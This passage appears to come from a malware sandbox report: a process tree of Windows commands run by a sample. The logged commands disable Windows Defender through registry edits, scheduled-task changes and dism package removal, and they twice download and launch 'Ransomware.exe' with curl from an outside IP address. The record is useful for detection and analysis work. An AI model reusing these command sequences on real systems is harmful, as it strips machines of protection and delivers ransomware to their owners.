        7⤵
        
        PID:1504
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Group-Policy-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
        7⤵
        
        PID:3764
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Management-Group-amcore-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
        7⤵
        
        PID:4464
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Management-Group-onecore-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
        7⤵
        
        PID:800
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Management-Group-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
        7⤵
        
        PID:2964
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Management-MDM-Group-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
        7⤵
        
        PID:1540
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Management-Powershell-Group-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
        7⤵
        
        PID:1352
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Nis-Group-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
        7⤵
        
        PID:4596
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Shield-Provider-Core-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
        7⤵
        
        PID:1384
        
        C:\Windows\system32\Dism.exe
        
        dism /online /remove-package /packagename:Windows-Defender-AM-Default-Definitions-Package~31bf3856ad364e35~amd64~~10.0.19041.1165 /NoRestart
        7⤵
        Drops file in Windows directory
        Suspicious use of AdjustPrivilegeToken
        
        PID:4264
        
        C:\Users\Admin\AppData\Local\Temp\102050D9-8E00-46D4-AA76-5F5657672563\dismhost.exe
        
        C:\Users\Admin\AppData\Local\Temp\102050D9-8E00-46D4-AA76-5F5657672563\dismhost.exe {19E62282-32FB-4729-9927-FBBB02A0171C}
        8⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops file in Windows directory
        
        PID:4688
        
        C:\Windows\system32\Dism.exe
        
        dism /online /remove-package /packagename:Windows-Defender-AppLayer-Group-amcore-Package~31bf3856ad364e35~amd64~~10.0.19041.1165 /NoRestart
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2364
        
        C:\Users\Admin\AppData\Local\Temp\CA8954D3-EBE0-40C5-93D7-6C5E85DD2B64\dismhost.exe
        
        C:\Users\Admin\AppData\Local\Temp\CA8954D3-EBE0-40C5-93D7-6C5E85DD2B64\dismhost.exe {DE8A0FC1-FA96-4D6E-96AF-02F576D93DA5}
        8⤵
        Executes dropped EXE
        Drops file in Windows directory
        
        PID:4656
        
        C:\Windows\system32\Dism.exe
        
        dism /online /remove-package /packagename:Windows-Defender-AppLayer-Group-onecore-Package~31bf3856ad364e35~amd64~~10.0.19041.1165 /NoRestart
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3600
        
        C:\Users\Admin\AppData\Local\Temp\4BD66C26-A51E-42E6-84D0-FB8E5B23C9DF\dismhost.exe
        
        C:\Users\Admin\AppData\Local\Temp\4BD66C26-A51E-42E6-84D0-FB8E5B23C9DF\dismhost.exe {D923A50A-E0A9-482F-8613-BC5FC2CF2F25}
        8⤵
        Executes dropped EXE
        Drops file in Windows directory
        
        PID:4708
        
        C:\Windows\system32\Dism.exe
        
        dism /online /remove-package /packagename:Windows-Defender-AppLayer-Group-Package~31bf3856ad364e35~amd64~~10.0.19041.1165 /NoRestart
        7⤵
        Drops file in Windows directory
        Suspicious use of AdjustPrivilegeToken
        
        PID:1276
        
        C:\Users\Admin\AppData\Local\Temp\10D67E8D-A778-432F-9CF1-0126D297877D\dismhost.exe
        
        C:\Users\Admin\AppData\Local\Temp\10D67E8D-A778-432F-9CF1-0126D297877D\dismhost.exe {10176E75-7A1B-4FAE-9B0B-AF48190BF6FB}
        8⤵
        Executes dropped EXE
        Drops file in Windows directory
        
        PID:624
        
        C:\Windows\system32\Dism.exe
        
        dism /online /remove-package /packagename:Windows-Defender-ApplicationGuard-Inbox-Package~31bf3856ad364e35~amd64~~10.0.19041.1165 /NoRestart
        7⤵
        Drops file in Windows directory
        Suspicious use of AdjustPrivilegeToken
        
        PID:1456
        
        C:\Users\Admin\AppData\Local\Temp\33F806F3-E0D3-4247-94F9-F8F47F430098\dismhost.exe
        
        C:\Users\Admin\AppData\Local\Temp\33F806F3-E0D3-4247-94F9-F8F47F430098\dismhost.exe {CF649099-41C5-4A19-9353-47BC676AB129}
        8⤵
        Executes dropped EXE
        
        PID:3464
        
        C:\Windows\system32\Dism.exe
        
        dism /online /remove-package /packagename:Windows-Defender-Client-Package~31bf3856ad364e35~amd64~~10.0.19041.1165 /NoRestart
        7⤵
        Drops file in Windows directory
        
        PID:4880
        
        C:\Users\Admin\AppData\Local\Temp\8D05ED45-F95C-42BB-9639-51B2770F1D8C\dismhost.exe
        
        C:\Users\Admin\AppData\Local\Temp\8D05ED45-F95C-42BB-9639-51B2770F1D8C\dismhost.exe {EF30CDF5-D1B0-40FC-A89C-8D88B64278E6}
        8⤵
        Executes dropped EXE
        
        PID:2808
        
        C:\Windows\system32\Dism.exe
        
        dism /online /remove-package /packagename:Windows-Defender-Group-Policy-Package~31bf3856ad364e35~amd64~~10.0.19041.1165 /NoRestart
        7⤵
        Drops file in Windows directory
        
        PID:4236
        
        C:\Users\Admin\AppData\Local\Temp\7ADD157C-6BE3-484A-BE90-4DD4733A10B0\dismhost.exe
        
        C:\Users\Admin\AppData\Local\Temp\7ADD157C-6BE3-484A-BE90-4DD4733A10B0\dismhost.exe {9304029E-D816-48CA-9646-3B41131BE423}
        8⤵
        Executes dropped EXE
        
        PID:3836
        
        C:\Windows\system32\Dism.exe
        
        dism /online /remove-package /packagename:Windows-Shield-Provider-Core-Package~31bf3856ad364e35~amd64~~10.0.19041.1165 /NoRestart
        7⤵
        Drops file in Windows directory
        
        PID:3896
        
        C:\Users\Admin\AppData\Local\Temp\F3A429EB-6C12-4780-97F5-B2023C7C8A50\dismhost.exe
        
        C:\Users\Admin\AppData\Local\Temp\F3A429EB-6C12-4780-97F5-B2023C7C8A50\dismhost.exe {08F210A6-2656-488B-8ACA-A7388D9CF9B2}
        8⤵
        Executes dropped EXE
        Drops file in Windows directory
        
        PID:4408
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\MRT" /v DontOfferThroughWUAU /t REG_DWORD /d 1 /f
        7⤵
        
        PID:772
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "SettingsPageVisibility" /t REG_SZ /d "hide:windowsdefender" /f
        7⤵
        
        PID:4404
        
        C:\Windows\system32\cmd.exe
        
        cmd.exe /k "C:\configuration\kill.bat"
        7⤵
        
        PID:4332
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\configuration\kill.bat" MY_FLAG
        8⤵
        
        PID:4788
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
        9⤵
        Modifies Windows Defender Real-time Protection settings
        
        PID:2268
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
        9⤵
        
        PID:3772
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
        9⤵
        
        PID:4840
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
        9⤵
        
        PID:2028
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
        9⤵
        Modifies Windows Defender Real-time Protection settings
        
        PID:4068
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
        9⤵
        
        PID:3492
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
        9⤵
        Modifies Windows Defender Real-time Protection settings
        
        PID:2128
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
        9⤵
        Modifies Windows Defender Real-time Protection settings
        
        PID:888
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
        9⤵
        Modifies Windows Defender Real-time Protection settings
        
        PID:2272
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
        9⤵
        
        PID:640
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
        9⤵
        
        PID:4212
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
        9⤵
        
        PID:4548
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
        9⤵
        
        PID:3508
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
        9⤵
        
        PID:3564
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
        9⤵
        
        PID:1492
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
        9⤵
        
        PID:2204
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
        9⤵
        
        PID:4648
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
        9⤵
        Executes dropped EXE
        
        PID:936
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
        9⤵
        
        PID:3880
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
        9⤵
        
        PID:932
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
        9⤵
        
        PID:2992
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
        9⤵
        
        PID:4280
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
        9⤵
        
        PID:3472
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
        9⤵
        
        PID:4536
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
        9⤵
        
        PID:5084
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
        9⤵
        
        PID:3344
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
        9⤵
        
        PID:2264
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
        9⤵
        
        PID:4772
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
        9⤵
        
        PID:4212
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
        9⤵
        Modifies security service
        
        PID:3104
        
        C:\Windows\system32\cmd.exe
        
        cmd.exe /k C:\configuration\run.bat
        9⤵
        
        PID:3776
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\configuration\run.bat" MY_FLAG
        10⤵
        
        PID:3488
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo j "
        11⤵
        
        PID:4488
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1
        11⤵
        
        PID:1492
        
        C:\Windows\system32\curl.exe
        
        curl http://111.90.151.174:7777/Ransomware.exe -O
        7⤵
        
        PID:4596
        
        C:\configuration\Ransomware.exe
        
        Ransomware.exe
        7⤵
        
        PID:936
    - - C:\Windows\system32\cmd.exe
        
        cmd.exe /k "C:\configuration\and.bat"
        5⤵
        
        PID:3804
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\configuration\and.bat" MY_FLAG
        6⤵
        Drops startup file
        
        PID:4552
        
        C:\Windows\system32\cacls.exe
        
        "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
        7⤵
        
        PID:2356
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c reg query "HKEY_CLASSES_ROOT\CLSID\{5FDD51E2-A9D0-44CE-8C8D-162BA0C591A0}" /v "Version"
        7⤵
        
        PID:1456
        
        C:\Windows\system32\reg.exe
        
        reg query "HKEY_CLASSES_ROOT\CLSID\{5FDD51E2-A9D0-44CE-8C8D-162BA0C591A0}" /v "Version"
        8⤵
        
        PID:5068
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\InboxApplications\Microsoft.Windows.SecHealthUI_10.0.19041.1165_neutral_neutral_cw5n1h2txyewy" /f
        7⤵
        
        PID:3256
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_CLASSES_ROOT\*\shellex\ContextMenuHandlers\EPP" /f
        7⤵
        
        PID:936
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_CLASSES_ROOT\Directory\shellex\ContextMenuHandlers\EPP" /f
        7⤵
        
        PID:2760
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_CLASSES_ROOT\Drive\shellex\ContextMenuHandlers\EPP" /f
        7⤵
        
        PID:3100
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-AM-Default-Definitions-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
        7⤵
        
        PID:4084
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-AppLayer-Group-amcore-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
        7⤵
        
        PID:4232
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-AppLayer-Group-onecore-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
        7⤵
        
        PID:2364
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-AppLayer-Group-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
        7⤵
        
        PID:1260
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-ApplicationGuard-Inbox-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
        7⤵
        
        PID:1276
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Client-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
        7⤵
        
        PID:1016
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-CloudClean-Group-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
        7⤵
        
        PID:3280
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Core-Group-amcore-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
        7⤵
        
        PID:736
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Core-Group-onecore-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
        7⤵
        
        PID:4212
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Core-Group-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
        7⤵
        
        PID:3344
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Group-Policy-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
        7⤵
        
        PID:2540
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Management-Group-amcore-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
        7⤵
        
        PID:3456
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Management-Group-onecore-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
        7⤵
        
        PID:2816
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Management-MDM-Group-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
        7⤵
        
        PID:3744
        
        C:\Windows\system32\Dism.exe
        
        dism /online /remove-package /packagename:Windows-Defender-AM-Default-Definitions-Package~31bf3856ad364e35~amd64~~10.0.19041.1165 /NoRestart
        7⤵
        Drops file in Windows directory
        Suspicious use of AdjustPrivilegeToken
        
        PID:4640
        
        C:\Users\Admin\AppData\Local\Temp\D5BA9BC6-017B-4B44-BFCA-4CE4082AA1A3\dismhost.exe
        
        C:\Users\Admin\AppData\Local\Temp\D5BA9BC6-017B-4B44-BFCA-4CE4082AA1A3\dismhost.exe {13132E6E-2199-4B90-9464-893745CCC5E9}
        8⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops file in Windows directory
        
        PID:2212
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Shield-Provider-Core-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
        7⤵
        
        PID:208
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Nis-Group-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
        7⤵
        
        PID:1160
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Management-Powershell-Group-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
        7⤵
        
        PID:4716
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Management-Group-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
        7⤵
        
        PID:1292
        
        C:\Windows\system32\Dism.exe
        
        dism /online /remove-package /packagename:Windows-Defender-AppLayer-Group-amcore-Package~31bf3856ad364e35~amd64~~10.0.19041.1165 /NoRestart
        7⤵
        Drops file in Windows directory
        Suspicious use of AdjustPrivilegeToken
        
        PID:4044
        
        C:\Users\Admin\AppData\Local\Temp\C42D969A-206C-4030-9821-F2C8948BED3A\dismhost.exe
        
        C:\Users\Admin\AppData\Local\Temp\C42D969A-206C-4030-9821-F2C8948BED3A\dismhost.exe {C9F11D02-4A27-42E6-905C-09B64E2A81A2}
        8⤵
        Executes dropped EXE
        Drops file in Windows directory
        
        PID:2360
        
        C:\Windows\system32\Dism.exe
        
        dism /online /remove-package /packagename:Windows-Defender-AppLayer-Group-onecore-Package~31bf3856ad364e35~amd64~~10.0.19041.1165 /NoRestart
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3004
        
        C:\Users\Admin\AppData\Local\Temp\EAFF5586-0D40-4442-88A0-A95CD98F57D9\dismhost.exe
        
        C:\Users\Admin\AppData\Local\Temp\EAFF5586-0D40-4442-88A0-A95CD98F57D9\dismhost.exe {248984A7-5401-44F3-9C48-C587AF26202B}
        8⤵
        Executes dropped EXE
        Drops file in Windows directory
        
        PID:4136
        
        C:\Windows\system32\Dism.exe
        
        dism /online /remove-package /packagename:Windows-Defender-AppLayer-Group-Package~31bf3856ad364e35~amd64~~10.0.19041.1165 /NoRestart
        7⤵
        Drops file in Windows directory
        Suspicious use of AdjustPrivilegeToken
        
        PID:2992
        
        C:\Users\Admin\AppData\Local\Temp\BA73C547-6950-46CC-B10A-FA924518BDF2\dismhost.exe
        
        C:\Users\Admin\AppData\Local\Temp\BA73C547-6950-46CC-B10A-FA924518BDF2\dismhost.exe {D59C803A-24FB-452D-BB10-2C29B62B9BBE}
        8⤵
        Executes dropped EXE
        
        PID:4028
        
        C:\Windows\system32\Dism.exe
        
        dism /online /remove-package /packagename:Windows-Defender-ApplicationGuard-Inbox-Package~31bf3856ad364e35~amd64~~10.0.19041.1165 /NoRestart
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5116
        
        C:\Users\Admin\AppData\Local\Temp\5C608C70-4DDB-4006-B70A-9A5C0202152A\dismhost.exe
        
        C:\Users\Admin\AppData\Local\Temp\5C608C70-4DDB-4006-B70A-9A5C0202152A\dismhost.exe {267F69DE-0AD3-49E3-ACCC-2CF03527F2A1}
        8⤵
        Executes dropped EXE
        Drops file in Windows directory
        
        PID:228
        
        C:\Windows\system32\Dism.exe
        
        dism /online /remove-package /packagename:Windows-Defender-Client-Package~31bf3856ad364e35~amd64~~10.0.19041.1165 /NoRestart
        7⤵
        
        PID:4632
        
        C:\Users\Admin\AppData\Local\Temp\3F5705B2-C460-42C2-9704-DC317DA60725\dismhost.exe
        
        C:\Users\Admin\AppData\Local\Temp\3F5705B2-C460-42C2-9704-DC317DA60725\dismhost.exe {B3DCD8DC-2B77-4B28-BF7A-275C25803C4B}
        8⤵
        Executes dropped EXE
        Drops file in Windows directory
        
        PID:1432
        
        C:\Windows\system32\Dism.exe
        
        dism /online /remove-package /packagename:Windows-Defender-Group-Policy-Package~31bf3856ad364e35~amd64~~10.0.19041.1165 /NoRestart
        7⤵
        Drops file in Windows directory
        
        PID:4748
        
        C:\Users\Admin\AppData\Local\Temp\3E63A590-EBB2-4AE7-BD43-E85525054C07\dismhost.exe
        
        C:\Users\Admin\AppData\Local\Temp\3E63A590-EBB2-4AE7-BD43-E85525054C07\dismhost.exe {B0744DE1-136C-4EC9-B398-63B13FAF4911}
        8⤵
        Executes dropped EXE
        Drops file in Windows directory
        
        PID:2820
        
        C:\Windows\system32\Dism.exe
        
        dism /online /remove-package /packagename:Windows-Shield-Provider-Core-Package~31bf3856ad364e35~amd64~~10.0.19041.1165 /NoRestart
        7⤵
        
        PID:3848
        
        C:\Users\Admin\AppData\Local\Temp\96553346-2EA6-4359-A6BA-BC9A3C4A0EA3\dismhost.exe
        
        C:\Users\Admin\AppData\Local\Temp\96553346-2EA6-4359-A6BA-BC9A3C4A0EA3\dismhost.exe {DB1BDA32-D111-478F-A761-BE5C813B6ACC}
        8⤵
        Executes dropped EXE
        
        PID:4600
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\MRT" /v DontOfferThroughWUAU /t REG_DWORD /d 1 /f
        7⤵
        
        PID:1332
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "SettingsPageVisibility" /t REG_SZ /d "hide:windowsdefender" /f
        7⤵
        
        PID:4280
        
        C:\Windows\system32\curl.exe
        
        curl http://111.90.151.174:7777/Ransomware.exe -O
        7⤵
        
        PID:4728
        
        C:\Windows\system32\cmd.exe
        
        cmd.exe /k "C:\configuration\kill.bat"
        7⤵
        
        PID:4556
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\configuration\kill.bat" MY_FLAG
        8⤵
        
        PID:216
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
        9⤵
        Modifies Windows Defender Real-time Protection settings
        
        PID:3500
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
        9⤵
        
        PID:4692
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
        9⤵
        
        PID:3228
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
        9⤵
        
        PID:2252
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
        9⤵
        Modifies Windows Defender Real-time Protection settings
        
        PID:260
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
        9⤵
        Modifies Windows Defender Real-time Protection settings
        
        PID:3096
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
        9⤵
        Modifies Windows Defender Real-time Protection settings
        
        PID:4680
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
        9⤵
        Modifies Windows Defender Real-time Protection settings
        
        PID:2072
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
        9⤵
        Modifies Windows Defender Real-time Protection settings
        
        PID:624
        
        C:\Windows\system32\reg.exe
        
